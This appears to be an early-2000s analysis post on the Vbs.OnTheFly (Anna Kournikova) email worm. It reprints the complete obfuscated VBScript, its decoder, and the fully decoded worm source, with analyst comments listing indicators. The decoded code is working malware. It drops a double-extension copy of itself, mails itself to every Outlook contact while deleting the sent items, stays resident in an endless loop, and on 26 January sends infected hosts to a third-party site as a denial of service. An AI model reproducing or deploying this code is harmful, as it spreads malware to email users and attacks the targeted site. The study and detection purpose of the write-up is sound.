I woke up today to find about three zillion copies of the Vbs.OnTheFly virus in my inbox. I can't believe people are still stupid enough to run attachments with ".vbs" extensions. Anyway, I set about decrypting the virus and figuring out what it does, so here are my results.

Basically, it's a very simple virus. The second line is an "Execute" statement whose string argument is the encoded virus body itself. The rest of the script is the function used to decode that string before it is run.

When you look at the decrypted code, you'll notice that it does four things:

  1. Writes a registry setting that tells the virus it has been executed.
  2. Saves the virus to a file (AnnaKournikova.jpg.vbs).
  3. Checks to see if it's January 26. If so, opens a browser and sends you to http://www.dynabyte.nl (this is a DoS attack on that site; it is not the homepage of the virus author).
  4. Sends copies of itself to everyone in your Outlook address book.

In case you're curious, the text it puts in your registry on line 5 is "Worm made with Vbswg 1.50b".


The original virus (linebreaks added to save your browser's sanity):
'Vbs.OnTheFly Created By OnTheFly
' The entire worm body is one obfuscated string literal handed to Execute.
' e7iqom5JE4z (defined below) decodes it at run time; the plaintext is the
' script shown further down under "The (rather easily) decrypted virus".
' Line breaks inside the literal were added for display only.
' Detection note: the literal changes with every re-encoding, but the decoder
' routine and the "Execute <decoder>(...)" call are the stable part of the sample.
Execute e7iqom5JE4z("X)udQ0VpgjnH{tEcggvf{DQVpgjnH{QptGqt
    tgTwugoPzgvUvgGQ9v58Jr7R6?EgtvcQgldeg*vY$eUktvrU0gjnn+
    $9G5QJv786r0Rgtyiktgv$MJWEu^hqyvtc^gpQjVHg{n$^.jE*t9:+(
    jE*t33+3(Etj3*63+(jE*t23+;(Etj5*+4(Etj3*;2+(jE*t9
    ;+(jE*t23+2(Etj3*32+(jE*t45+(jE*t33+;(Etj3*72+(jE
    *t33+8(Etj3*62+(jE*t45+(jE*t8:+(jE*t:;+(jE*t33+7(
    Etj3*;3+(jE*t23+5(Etj5*+4(Etj6*+;(Etj6*+8(Etj7*+5
    (Etj6*+:(Etj;*+:gUvQtcyVopldi?7Egtvcqgldeg*vu$t
    erkkviph0nkugu{gvqoldeg$v+tyQoclVip7de0rqh{nkguyterk0veukt
    vrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwk
    pqmcxl0irx0ud$kh9G5QJv786r0Rgtticgf$*MJWEu^hqyvtc^gpQjVHg
    {no^kcgn$f+@>$$3vgjpgp4CUJ9inEN+*pgfhkhkopqj
    vp*yq+3?cfpf{cp*yq+4?8jvpg9G5QJv786r0RwtpJ$vv<r11yy0y
    {fcp{dgvp0$n5.h.ncgupgfhkgUvMLUiJy9M59?ztyQoclVi
    p7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo.+3P\L7\Mz6wk?XLiM
    yUMJ99z5t0cgcfnnMLUiJy9M590znEuqgFqKhqPvt*yQocl
    Vip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++VgjpUvgWKg44:|6R
    2x?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gV
    wt+ggW4K|4R:x602tyvk\g7PML6\kzXwgW4K|4R:x602nEuqgGfpK
    hNqqrHpwveqkp4gUp9CnJNi*E+QptGqttgTwugoPzgvU
    vgF54xQOzM8JT?EgtvcQgldeg*vQ$vwqnmqC0rrkncekvpq+$hKF54
    xQOzM8JT?Q$vwqnmqV$gjpUvgl74PvD\h;n:F?54xQOzM8JTI0v
    gcPgorUec*gO$RC$K+UvgUm834i35gN5?4lv7\P;D:h0nfCtfugNuukuv
    qHtcGjeL4TRoOuD4ToKp8U4m33gi55NKhTLo4uR4OoD0Tf
    CtfugGuvpktugE0wqvp>@2jVpg6fFDz5yi3xL?TLo4uR4OoD0TfCtf
    ugGuvpktugE0wqvpqHt9Z;:cX|5gT?|3Vq6fFDz5yi3xLUv
    gk9sd4:6x5\5?F54xQOzM8JTE0gtvcKggv*o+2gUvKQ6GXDl[LQ:?
    TLo4uR4OoD0TfCtfugGuvpktugZ*:9X;5cT||g+k9sd4:6x5\5V0
    q?KQ6GXDl[LQ0:fCtfuguk9sd4:6x5\5U0dwglve?$gJgt{wqjxc.g
    =+q$k9sd4:6x5\5D0fq{?J$<k$(dxtehn($jEegmjVuk$
    #(xednth($$guvYhpu:sI[h;?3sk496d5:5x0\vCcvjegovpuhuY
    sp[:;I3hC0fftyQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMt
    wkpqmcxl0irx0ud$k9sd4:6x5\5F0ngvgCgvhtgwUodvk?VwtgKhsk
    496d5:5x0\qV>@$$Vgjpk9sd4:6x5\5U0pgfGQ9v58Jr7R6t
    0igtyvkgJ$EM^WquvhcygtQ^VpgjnH^{conkfg.$$$3pGfhKgPvz
    pGfhKgPvzpgfhkpGfwHepkvpqX)udiy370d2")
' Decoder for the Execute payload above.
' Walks the input two characters at a time. Each character is mapped:
'   Asc = 15 -> LF, Asc = 16 -> CR, Asc = 17 -> space, anything else -> Chr(Asc - 2).
' The two decoded characters of each pair are then appended in SWAPPED order
' (second, then first), so the encoding is "shift by +2, swap adjacent pairs".
' The empty-string test on the second character handles an odd-length input,
' where Mid past the end returns "" (Asc("") would raise an error).
' Analyst note: because the decoder ships in clear text, the payload can be
' recovered statically by running this same routine over the literal.
Function e7iqom5JE4z(hFeiuKrcoj3)
For I = 1 To Len(hFeiuKrcoj3) Step 2
StTP1MoJ3ZU= Mid(hFeiuKrcoj3, I, 1)
WHz23rBqlo7= Mid(hFeiuKrcoj3, I + 1, 1)
' First character of the pair: control-code escapes, else shift down by 2.
If Asc(StTP1MoJ3ZU) = 15 Then
StTP1MoJ3ZU= Chr(10)
ElseIf Asc(StTP1MoJ3ZU) = 16 Then
StTP1MoJ3ZU = Chr(13)
ElseIf Asc(StTP1MoJ3ZU) = 17 Then
StTP1MoJ3ZU = Chr(32)
Else
StTP1MoJ3ZU = Chr(Asc(StTP1MoJ3ZU) - 2)
End If
' Second character of the pair: same mapping, guarded for odd-length input.
If WHz23rBqlo7<> "" Then
If Asc(WHz23rBqlo7) = 15 Then
WHz23rBqlo7= Chr(10)
ElseIf Asc(WHz23rBqlo7) = 16 Then
WHz23rBqlo7= Chr(13)
ElseIf Asc(WHz23rBqlo7) = 17 Then
WHz23rBqlo7= Chr(32)
Else
WHz23rBqlo7= Chr(Asc(WHz23rBqlo7) - 2)
End If
End If
' Emit second-then-first: this is the pair swap.
e7iqom5JE4z = e7iqom5JE4z & WHz23rBqlo7 & StTP1MoJ3ZU
Next
End Function
'Vbswg 1.50b


The (rather easily) decrypted virus:
'Vbs.OnTheFly Created By OnTheFly
' Decoded worm body (main script). Indicators visible in this section:
'   registry key  HKCU\software\OnTheFly\  (default value "Worm made with Vbswg 1.50b",
'                 built from Chr() calls below to avoid a plain-text string)
'   registry value HKCU\software\OnTheFly\mailed = "1"  (set by the mailer function)
'   dropped file  <Windows folder>\AnnaKournikova.jpg.vbs  (double extension)
'   a wscript.exe process that never exits (see the Do...Loop at the end)
' Every error is swallowed, so failed steps leave no trace.
On Error Resume Next

Set E7O3tH65p4P = CreateObject("WScript.Shell")
' Infection marker / generator tag. The Chr() chain spells "Worm made with Vbswg 1.50b".
' (Line breaks here were added for display; the statement is one line in the sample.)
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) 
& Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & 
Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & 
Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)

' Drop a copy of the running script into the Windows folder (GetSpecialFolder(0)).
' The ".jpg.vbs" double extension is what the mail attachment relies on.
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"

' Mass-mail only once per user: the "mailed" value is written by e2nSA7HlgLC after a send.
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
    e2nSA7HlgLC()
end if

' Date-triggered payload: on 26 January open the URL in the default browser
' (window style 3 = maximized, do not wait). Every infected host hitting the
' same site on the same day is the denial-of-service effect described above.
if month(now) =1 and day(now) =26 then
    E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if

' Read the worm's own source into memory so it can be rewritten if removed.
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close

' Endless loop with no exit condition: the interpreter stays resident and
' re-creates the script file whenever it disappears (file-level persistence).
' Note the missing space in ".writeZN5JKZ4xiuV" -- presumably a transcription
' artifact of this listing; with On Error Resume Next a bad call here fails silently.
Do
    If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
        Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True)
        UeI22z8P4v0.writeZN5JKZ4xiuV
        UeI22z8P4v0.Close
    End If
Loop

' Mass-mailer. Uses Outlook automation to send one message per address entry
' in every Outlook address list, with the dropped Windows-folder copy attached.
' Depends on the script-level objects E7O3tH65p4P (WScript.Shell) and
' rOwamTjngb5 (FileSystemObject) created in the main body.
' Indicators: Subject "Here you have, ;o)", body "Hi:" / "Check This!",
' attachment AnnaKournikova.jpg.vbs, and sent items deleted on submit.
Function e2nSA7HlgLC()
    On Error Resume Next
    Set D23OvxM6KRH = CreateObject("Outlook.Application")
    
    ' Comparing the object to a string goes through its default property,
    ' presumably the application name; if CreateObject failed the test is false
    ' and nothing is sent.
    If D23OvxM6KRH= "Outlook"Then
        Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
        Set S6k211ge33L= j25tNZB9f8l.AddressLists

        For Each JR2mPsM2BmR In S6k211ge33L
            If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
                d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
                
                For X789Va3zRez= 1 To d4BD3xgwv1J
                    ' CreateItem(0) is a mail item.
                    Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
                    Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
                    iq72b483v3Z.To = OIE4BVYjOJ8.Address
                    iq72b483v3Z.Subject = "Here you have, ;o)"
                    iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
                    set fWsnq8YG9f1=iq72b483v3Z.Attachments
                    fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
                    ' No copy is kept in Sent Items, hiding the activity from the user.
                    iq72b483v3Z.DeleteAfterSubmit = True
                    
                    If iq72b483v3Z.To <> "" Then
                        iq72b483v3Z.Send
                        ' Written after the first successful send; the main body
                        ' checks this value to avoid mailing again on later runs.
                        E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
                    End If
                Next

            End If
        Next
    end if
End Function
'Vbswg 1.50b